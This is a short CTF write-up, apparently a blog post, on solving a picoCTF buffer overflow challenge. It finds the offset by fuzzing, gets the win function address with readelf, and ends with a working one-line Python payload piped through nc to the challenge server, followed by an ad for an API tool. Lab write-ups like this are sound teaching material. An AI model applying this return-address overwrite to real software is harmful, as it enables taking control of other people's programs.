PicoCTF Buffer Overflow -part 2

The last article was not complete, it had some knowledge gaps and partial results, we will be removing those inconveniences today.

The summary of yesterday's article is that we tried to overflow the binary, but the prod version did not overflow.

Let's get back to constructive problem solving, taking obvious steps that lead us to a solution.

We need to overflow the BUFSIZE variable, which is a 32-byte buffer. Let's try a sample payload of 32 random characters.

It did not change the return address. Let's try to add 4 more letters and try. Repeat this process until you get a change in value of the result. This approach is called fuzzing, usually it's automated.

Something changed while we tried 44 letters. This means at that point the overflow happened.

When we tried 48 it returned bask the ascii values of the last 4 letters in the results.(in reverse order)

So what happened here?

In a stack frame, memory is structured like this :

[ Local Variables (e.g., buffer[32]) ][ Saved EBP ][ Return Address (EIP) ]        

Saved EBP - 4 bytes

Return Address EIP - 4 bytes

So, our payload completely overflowed the EIP. There will be some function specific padding used that's why the numbers didn't add up.

Now we need to get the address of the win function. Let's try readelf command.

It displays the symbol table of the ELF (Executable and Linkable Format) binary file vuln.

➜  Downloads readelf -s vuln | grep win
    63: 080491f6   139 FUNC    GLOBAL DEFAULT   13 win        

Now, let's replace the the 'laaa' with the address of win function 0x080491f6. We need to convert it into little endian first.

The byte \xf6 corresponds to the ASCII character ö in Latin-1 encoding. When printed directly, it may display as ö instead of the raw byte \xf6. To solve this, use sys.stdout.buffer.write() to write raw bytes (bypassing string encoding).

Now we got the our dummy flag correctly. Now lets try to access the prod flag (actual one).

python3 -c "import sys; sys.stdout.buffer.write(b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08\n')" | nc saturn.picoctf.net 63690        

Add a \n to the stdout value to get the pipe working.

Thanks for the read. Happy hacking.

Try out LiveAPI. Get your backend APIs documented automatically. It supports 90+ backend frameworks and 20+ programming languages. Please give it a try and provide your feedback.